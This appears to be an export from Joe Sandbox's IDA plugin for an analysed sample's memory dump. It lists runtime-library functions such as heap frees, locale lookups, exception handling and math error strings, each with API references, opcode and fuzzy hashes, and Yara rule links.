Part of subcall function 00F18AC7: GetLastError.KERNEL32(?,?,00000008,00F1D5ED,00F0B220,00F0B266,?,00F0B0AD,00000000,00000000,00000000,00000004,00F0A379,00000001,00000000,00000000), ref: 00F18ACC
Part of subcall function 00F18AC7: SetLastError.KERNEL32(00000000,00000005,000000FF,?,00F0B0AD,00000000,00000000,00000000,00000004,00F0A379,00000001,00000000,00000000,00000000,00F0A511), ref: 00F18B6A

EnumSystemLocalesW.KERNEL32(00F21FB2,00000001,?,?,?,00F2281A,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00F22090

Memory Dump Source

Source File: 00000000.00000002.461047929.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.461043214.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462055576.0000000001189000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462283093.00000000011A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462304467.00000000011AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_MzRn1YNrbz.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: b03beed5695b01c5cef0e75ffd3da9698de3a264bea0260eb0c850e8cecf413c
Instruction ID: b1a53211edd0cb4e90d365bcd58ab9b5a42831c8f542034f66b28286271d4503
Opcode Fuzzy Hash: b03beed5695b01c5cef0e75ffd3da9698de3a264bea0260eb0c850e8cecf413c
Instruction Fuzzy Hash: C6F0AB3630020867CB14DF39E815B7ABFA4FFC1764B4A4059FA068B240C735D883D790

Uniqueness

Uniqueness Score: -1.00%

Function 00F17F08 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,00F16630,?,20001004,00000000,00000002,?,?,00F15C3D), ref: 00F17F3C

Memory Dump Source

Source File: 00000000.00000002.461047929.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.461043214.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462055576.0000000001189000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462283093.00000000011A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462304467.00000000011AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_MzRn1YNrbz.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: e3246b62346aa27d68783269b32ef65846ac384a564ab8e2c2972801f3a31459
Instruction ID: 7e6faa662b856e9cbe225cc9410d65dd45bcdd3753e00a236e0cc7480bc11a0b
Opcode Fuzzy Hash: e3246b62346aa27d68783269b32ef65846ac384a564ab8e2c2972801f3a31459
Instruction Fuzzy Hash: 62E04F3650821DBBCF263F61DC09AEE3E2AEF44760F008020FD1965161CB768DA2BBD0

Uniqueness

Uniqueness Score: -1.00%

Function 00F10B43 Relevance: 1.4, Strings: 1, Instructions: 173COMMON

Download Yara Rule

Strings

0, xrefs: 00F10CBF

Memory Dump Source

Source File: 00000000.00000002.461047929.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.461043214.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462055576.0000000001189000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462283093.00000000011A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462304467.00000000011AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_MzRn1YNrbz.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 5fad6e7eed50ebb6264b4d9d89e5aa598a7afa1e849364fa9f6f7268cbd320ef
Instruction ID: 66a0c16f9f1c07f74d274782c84e873c6fb4f0618a2c043d0f192770b07d49f1
Opcode Fuzzy Hash: 5fad6e7eed50ebb6264b4d9d89e5aa598a7afa1e849364fa9f6f7268cbd320ef
Instruction Fuzzy Hash: D651A031A007089ADB38CA688891BFF779A9F51314F04021DD487D7281DED5ADC8FB95

Uniqueness

Uniqueness Score: -1.00%

Function 00F2297A Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00F2297A

Memory Dump Source

Source File: 00000000.00000002.461047929.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.461043214.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462055576.0000000001189000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462283093.00000000011A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462304467.00000000011AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_MzRn1YNrbz.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 679b4b9b564e6e55815639547dd86b15c14d0ca6ddf30d0397976b4b663498ae
Instruction ID: 13f4e0156aa84030cde53ceeaf3c05090b6eef6162895c58491096169640aed2
Opcode Fuzzy Hash: 679b4b9b564e6e55815639547dd86b15c14d0ca6ddf30d0397976b4b663498ae
Instruction Fuzzy Hash: 19A01130208200CBAB288F32AA0820C3AA8AA88280300C038A020C2208EA208080AF02

Uniqueness

Uniqueness Score: -1.00%

Function 00F1D7C9 Relevance: .6, Instructions: 637COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.461047929.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.461043214.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462055576.0000000001189000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462283093.00000000011A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462304467.00000000011AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_MzRn1YNrbz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a105c3997696c3379010f1c9d96cbaeba6e8c9eb3fa701c0b98d7fe9eea30529
Instruction ID: 8db71765f19f559a6d8ee67e16c048a9efae42fc98d0dcac77877e7c1fb2e6e0
Opcode Fuzzy Hash: a105c3997696c3379010f1c9d96cbaeba6e8c9eb3fa701c0b98d7fe9eea30529
Instruction Fuzzy Hash: F6323622D29F414DDB2B5534D832339A298AFB73D8F15D737F826B5999EB28C5C35200

Uniqueness

Uniqueness Score: -1.00%

Function 00F21868 Relevance: .3, Instructions: 327COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.461047929.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.461043214.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462055576.0000000001189000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462283093.00000000011A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462304467.00000000011AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_MzRn1YNrbz.jbxd

Similarity

API ID: ErrorLastProcess_free$CurrentFeatureInfoLocalePresentProcessorTerminate
String ID:
API String ID: 4283097504-0
Opcode ID: 000d11e3e2ed3d3f292f58aea04e1a6de08f8a3330e69f03f72840784904d4fb
Instruction ID: 1c254a311dfcc5ef4411490ecb9df76b9082bb92460435448b5c9a4286fce7f5
Opcode Fuzzy Hash: 000d11e3e2ed3d3f292f58aea04e1a6de08f8a3330e69f03f72840784904d4fb
Instruction Fuzzy Hash: C7B139359007158BDB38AB24DC92BB7B3B9FF64318F14452DE943C6680FA79E985EB04

Uniqueness

Uniqueness Score: -1.00%

Function 00F2504D Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.461047929.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.461043214.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462055576.0000000001189000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462283093.00000000011A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462304467.00000000011AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_MzRn1YNrbz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e988e1e116756ea7f589fe3dded7965f37cbd4cd8079852bc72a8bd7fbbc0776
Instruction ID: 35c835bd94b7c75a668ce8ebf6c284adef2b53696f2394a5a69f290e2ebe0572
Opcode Fuzzy Hash: e988e1e116756ea7f589fe3dded7965f37cbd4cd8079852bc72a8bd7fbbc0776
Instruction Fuzzy Hash: 4221B673F2083947770CC47E9C5327DB6E1C78C501745823AE8A6EA2C1D968D917E2E4

Uniqueness

Uniqueness Score: -1.00%

Function 00F24F2D Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.461047929.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.461043214.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462055576.0000000001189000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462283093.00000000011A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462304467.00000000011AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_MzRn1YNrbz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7278b84eb67267d786a68df33a3637a3c8b9fc784798338c229475c29d30e606
Instruction ID: 2cde897e760c782cb5e9e87b79a6a836126b0d2560f19aada78a59fdcb93f47e
Opcode Fuzzy Hash: 7278b84eb67267d786a68df33a3637a3c8b9fc784798338c229475c29d30e606
Instruction Fuzzy Hash: 5611A723F30C355B675C81698C1327AA5D2DBD824070F433AD826E7284E994DE13D290

Uniqueness

Uniqueness Score: -1.00%

Function 00F027C0 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.461047929.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.461043214.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462055576.0000000001189000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462283093.00000000011A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462304467.00000000011AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_MzRn1YNrbz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4738e9d22b7a670e957569a9947fd17b9771784ab9a70797d5a1e1428e800be
Instruction ID: be7eecee3400b42b3e558a840de4aeb97e4223185f45bdd8b65d759b642826a8
Opcode Fuzzy Hash: a4738e9d22b7a670e957569a9947fd17b9771784ab9a70797d5a1e1428e800be
Instruction Fuzzy Hash: 85A002321A5B8CC7C612A68DA651B51B3ECE348D54F440461A50D43E015659B9108495

Uniqueness

Uniqueness Score: -1.00%

Function 00F13595 Relevance: 22.9, APIs: 15, Instructions: 357COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00F13604
_free.LIBCMT ref: 00F1361A
_free.LIBCMT ref: 00F1362D
_free.LIBCMT ref: 00F13642
_free.LIBCMT ref: 00F13657
GetCPInfo.KERNEL32(?,?), ref: 00F136A1

Part of subcall function 00F1CDC9: _free.LIBCMT ref: 00F1CE34

_free.LIBCMT ref: 00F1390C
_free.LIBCMT ref: 00F1391F
_free.LIBCMT ref: 00F1392D
_free.LIBCMT ref: 00F13938
_free.LIBCMT ref: 00F1397A
_free.LIBCMT ref: 00F13982
_free.LIBCMT ref: 00F13988
_free.LIBCMT ref: 00F13990
_free.LIBCMT ref: 00F1399E

Memory Dump Source

Source File: 00000000.00000002.461047929.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.461043214.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462055576.0000000001189000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462283093.00000000011A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462304467.00000000011AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_MzRn1YNrbz.jbxd

Similarity

API ID: _free$Info
String ID:
API String ID: 2509303402-0
Opcode ID: 89100d7b614405fcf4ab8850de24290af3beb66f2f876b1f868c3c7d85f7fa18
Instruction ID: 068aa29a3ffd9d06e6660104b3a3a0631a947718668d466cad89c8e367e06103
Opcode Fuzzy Hash: 89100d7b614405fcf4ab8850de24290af3beb66f2f876b1f868c3c7d85f7fa18
Instruction Fuzzy Hash: AED1C071D043059FEB11DFB8C881BEEBBF5BF08310F544069E499AB282D774A985EB60

Uniqueness

Uniqueness Score: -1.00%

Function 00F2139E Relevance: 19.6, APIs: 13, Instructions: 113COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 00F213E2

Part of subcall function 00F2064A: _free.LIBCMT ref: 00F20667
Part of subcall function 00F2064A: _free.LIBCMT ref: 00F20679
Part of subcall function 00F2064A: _free.LIBCMT ref: 00F2068B
Part of subcall function 00F2064A: _free.LIBCMT ref: 00F2069D
Part of subcall function 00F2064A: _free.LIBCMT ref: 00F206AF
Part of subcall function 00F2064A: _free.LIBCMT ref: 00F206C1
Part of subcall function 00F2064A: _free.LIBCMT ref: 00F206D3
Part of subcall function 00F2064A: _free.LIBCMT ref: 00F206E5
Part of subcall function 00F2064A: _free.LIBCMT ref: 00F206F7
Part of subcall function 00F2064A: _free.LIBCMT ref: 00F20709
Part of subcall function 00F2064A: _free.LIBCMT ref: 00F2071B
Part of subcall function 00F2064A: _free.LIBCMT ref: 00F2072D
Part of subcall function 00F2064A: _free.LIBCMT ref: 00F2073F

_free.LIBCMT ref: 00F213D7

Part of subcall function 00F1799F: HeapFree.KERNEL32(00000000,00000000,?,00F20D9F,?,00000000,?,?,?,00F21042,?,00000007,?,?,00F21535,?), ref: 00F179B5
Part of subcall function 00F1799F: GetLastError.KERNEL32(?,?,00F20D9F,?,00000000,?,?,?,00F21042,?,00000007,?,?,00F21535,?,?), ref: 00F179C7

_free.LIBCMT ref: 00F213F9
_free.LIBCMT ref: 00F2140E
_free.LIBCMT ref: 00F21419
_free.LIBCMT ref: 00F2143B
_free.LIBCMT ref: 00F2144E
_free.LIBCMT ref: 00F2145C
_free.LIBCMT ref: 00F21467
_free.LIBCMT ref: 00F2149F
_free.LIBCMT ref: 00F214A6
_free.LIBCMT ref: 00F214C3
_free.LIBCMT ref: 00F214DB

Memory Dump Source

Source File: 00000000.00000002.461047929.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.461043214.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462055576.0000000001189000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462283093.00000000011A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462304467.00000000011AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_MzRn1YNrbz.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: b6bd030cbeeb2a0477175fb3059b32230bfc613944d16b8a76f53f6e8f55cdba
Instruction ID: 4e08473af32358f95dbf6c789dc933159baecdaac6300aba3876fb6fca464a82
Opcode Fuzzy Hash: b6bd030cbeeb2a0477175fb3059b32230bfc613944d16b8a76f53f6e8f55cdba
Instruction Fuzzy Hash: 04314B31A04314AFEB21BB38EC55B96B3EABF11360F54581AE04DD7191DF39AC84AB18

Uniqueness

Uniqueness Score: -1.00%

Function 00F20748 Relevance: 18.4, APIs: 12, Instructions: 373COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00F20790
_free.LIBCMT ref: 00F207B4
_free.LIBCMT ref: 00F207C1
_free.LIBCMT ref: 00F207E6
_free.LIBCMT ref: 00F207F3
_free.LIBCMT ref: 00F207FC
_free.LIBCMT ref: 00F20AD6
_free.LIBCMT ref: 00F20ADE

Memory Dump Source

Source File: 00000000.00000002.461047929.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.461043214.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462055576.0000000001189000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462283093.00000000011A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462304467.00000000011AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_MzRn1YNrbz.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 219662fc889bbc7929c106228e23cf9a4bd772f4b9b0c94baf585fdfb1440bad
Instruction ID: bf8055fbecc1c22c89177b63bd6d6301b981e1d470b903db58477e1941074639
Opcode Fuzzy Hash: 219662fc889bbc7929c106228e23cf9a4bd772f4b9b0c94baf585fdfb1440bad
Instruction Fuzzy Hash: C0C14577D40208AFDB20DBA8DC82FDE77F8AF08710F544065FA19FB286D67499419B94

Uniqueness

Uniqueness Score: -1.00%

Function 00F0EA58 Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 304COMMONLIBRARYCODE

Download Yara Rule

APIs

IsInExceptionSpec.LIBVCRUNTIME ref: 00F0EB55
type_info::operator==.LIBVCRUNTIME ref: 00F0EB77
___TypeMatch.LIBVCRUNTIME ref: 00F0EC86
IsInExceptionSpec.LIBVCRUNTIME ref: 00F0ED58
_UnwindNestedFrames.LIBCMT ref: 00F0EDDC
CallUnexpected.LIBVCRUNTIME ref: 00F0EDF7

Strings

csm, xrefs: 00F0EA95
csm, xrefs: 00F0EBAE
csm, xrefs: 00F0EB02

Memory Dump Source

Source File: 00000000.00000002.461047929.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.461043214.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462055576.0000000001189000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462283093.00000000011A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462304467.00000000011AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_MzRn1YNrbz.jbxd

Similarity

API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 2123188842-393685449
Opcode ID: bd5e33ed3eded246827567b3e1b1002df185880db8d98fa91a4c0bdabdcdd37e
Instruction ID: 68c19d1414475a0ca6a8c75cdd2260df8ab803b179a4ff25afef1b1045b8bd16
Opcode Fuzzy Hash: bd5e33ed3eded246827567b3e1b1002df185880db8d98fa91a4c0bdabdcdd37e
Instruction Fuzzy Hash: 28B19A71C01209EFCF28DFA4D8819AEBBB5FF14320F14486AE8156B292D735DA51FB91

Uniqueness

Uniqueness Score: -1.00%

Function 00F189AF Relevance: 15.1, APIs: 10, Instructions: 69COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00F189C5

Part of subcall function 00F1799F: HeapFree.KERNEL32(00000000,00000000,?,00F20D9F,?,00000000,?,?,?,00F21042,?,00000007,?,?,00F21535,?), ref: 00F179B5
Part of subcall function 00F1799F: GetLastError.KERNEL32(?,?,00F20D9F,?,00000000,?,?,?,00F21042,?,00000007,?,?,00F21535,?,?), ref: 00F179C7

_free.LIBCMT ref: 00F189D1
_free.LIBCMT ref: 00F189DC
_free.LIBCMT ref: 00F189E7
_free.LIBCMT ref: 00F189F2
_free.LIBCMT ref: 00F189FD
_free.LIBCMT ref: 00F18A08
_free.LIBCMT ref: 00F18A13
_free.LIBCMT ref: 00F18A1E
_free.LIBCMT ref: 00F18A2C

Memory Dump Source

Source File: 00000000.00000002.461047929.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.461043214.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462055576.0000000001189000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462283093.00000000011A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462304467.00000000011AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_MzRn1YNrbz.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 51b38417f717fd8079c5b0be22019638f697b1efca1bf2995633118f8af3ccb2
Instruction ID: 73f38cbb8089580f3f67e5453da2a757fcbabc79e9f59495701640b81404ad1b
Opcode Fuzzy Hash: 51b38417f717fd8079c5b0be22019638f697b1efca1bf2995633118f8af3ccb2
Instruction Fuzzy Hash: 1E21CB76904208AFDB01FF94CC91DDEBBBABF08340F405565F5199B161DB35DA88DB80

Uniqueness

Uniqueness Score: -1.00%

Function 00F25144 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 147COMMONLIBRARYCODE

Download Yara Rule

APIs

DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,00F1DFC6), ref: 00F2515D

Strings

sqrt, xrefs: 00F2529C
log, xrefs: 00F251BA, 00F251C9
pow, xrefs: 00F251FB, 00F252A5, 00F252F2
acos, xrefs: 00F25293
asin, xrefs: 00F2528A
exp, xrefs: 00F251DC, 00F25241
log10, xrefs: 00F2519F, 00F251AE

Memory Dump Source

Source File: 00000000.00000002.461047929.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.461043214.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462055576.0000000001189000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462283093.00000000011A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462304467.00000000011AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_MzRn1YNrbz.jbxd

Similarity

API ID: DecodePointer
String ID: acos$asin$exp$log$log10$pow$sqrt
API String ID: 3527080286-3064271455
Opcode ID: 3616a46b4c6f92f616fef3ece355db83863153493744f8f9a9b21bd5dfcdf758
Instruction ID: 40dc6364a453174746a2a4c447ed04a7973a643b1f0315c91da5e529ccd70050
Opcode Fuzzy Hash: 3616a46b4c6f92f616fef3ece355db83863153493744f8f9a9b21bd5dfcdf758
Instruction Fuzzy Hash: 95519A71D00A2EDBCF189FA8F94C2ADBBB5FF44724F258045D491AB2D4C7348964AF54

Uniqueness

Uniqueness Score: -1.00%

Function 00F20B67 Relevance: 13.7, APIs: 9, Instructions: 199COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00F20BD5
_free.LIBCMT ref: 00F20BE1
_free.LIBCMT ref: 00F20D0A
_free.LIBCMT ref: 00F20D15

Memory Dump Source

Source File: 00000000.00000002.461047929.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.461043214.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462055576.0000000001189000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462283093.00000000011A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462304467.00000000011AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_MzRn1YNrbz.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: deaa228a88cb1375692a9b1ea3b894f983bd78e42a95186eabc75c87e9a72154
Instruction ID: 2547b09ab25e5ce12f37b2dc85a79ac6b8fee823921df25ed8409abac1d1f95d
Opcode Fuzzy Hash: deaa228a88cb1375692a9b1ea3b894f983bd78e42a95186eabc75c87e9a72154
Instruction Fuzzy Hash: E561E5B3900315AFD720DF64D841BAAB7F9EB44320F604569E955EB282EF70AD81EB50

Uniqueness

Uniqueness Score: -1.00%

Function 00F2000C Relevance: 12.2, APIs: 8, Instructions: 203COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 00F20036
_free.LIBCMT ref: 00F2010F
_free.LIBCMT ref: 00F2013C

Memory Dump Source

Source File: 00000000.00000002.461047929.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.461043214.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462055576.0000000001189000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462283093.00000000011A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462304467.00000000011AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_MzRn1YNrbz.jbxd

Similarity

API ID: _free$___from_strstr_to_strchr
String ID:
API String ID: 3409252457-0
Opcode ID: 51425451fd5d4c2545b4ce9191c0b9163959646a12417b94e47133af41f11332
Instruction ID: e75b7b345561da28d28b3f88ac2088ce107812b06f5e8c21672932a68176cb03
Opcode Fuzzy Hash: 51425451fd5d4c2545b4ce9191c0b9163959646a12417b94e47133af41f11332
Instruction Fuzzy Hash: 1A51F772D08325AFEB24BFB4BC55AAD7BB4AF01320F44416AE5549B1C3EF398981E750

Uniqueness

Uniqueness Score: -1.00%

Function 00F0B7C3 Relevance: 12.2, APIs: 8, Instructions: 175COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 00F0B80C
__alloca_probe_16.LIBCMT ref: 00F0B838
MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 00F0B877
LCMapStringEx.KERNEL32 ref: 00F0B894
LCMapStringEx.KERNEL32 ref: 00F0B8D3
__alloca_probe_16.LIBCMT ref: 00F0B8F0
LCMapStringEx.KERNEL32 ref: 00F0B932
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00F0B955

Memory Dump Source

Source File: 00000000.00000002.461047929.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.461043214.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462055576.0000000001189000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462283093.00000000011A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462304467.00000000011AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_MzRn1YNrbz.jbxd

Similarity

API ID: ByteCharMultiStringWide$__alloca_probe_16
String ID:
API String ID: 2040435927-0
Opcode ID: a45f67de575fc9eb48954eda11e35e9f9f0ac6da6637cc05d7bfdbd4f02420b0
Instruction ID: d3b013571aaf9c30de5e82ab19f9c65599e2b3dece92f3f127a2d2113af50e26
Opcode Fuzzy Hash: a45f67de575fc9eb48954eda11e35e9f9f0ac6da6637cc05d7bfdbd4f02420b0
Instruction Fuzzy Hash: 2E51BF72A0021AEFEF209F64CC45FAE7BA9EF447A4F104425FA14A61A4D7348D51FB60

Uniqueness

Uniqueness Score: -1.00%

Function 00F1626E Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 255COMMON

Download Yara Rule

APIs

Part of subcall function 00F18AC7: GetLastError.KERNEL32(?,?,00000008,00F1D5ED,00F0B220,00F0B266,?,00F0B0AD,00000000,00000000,00000000,00000004,00F0A379,00000001,00000000,00000000), ref: 00F18ACC
Part of subcall function 00F18AC7: SetLastError.KERNEL32(00000000,00000005,000000FF,?,00F0B0AD,00000000,00000000,00000000,00000004,00F0A379,00000001,00000000,00000000,00000000,00F0A511), ref: 00F18B6A

_free.LIBCMT ref: 00F16559
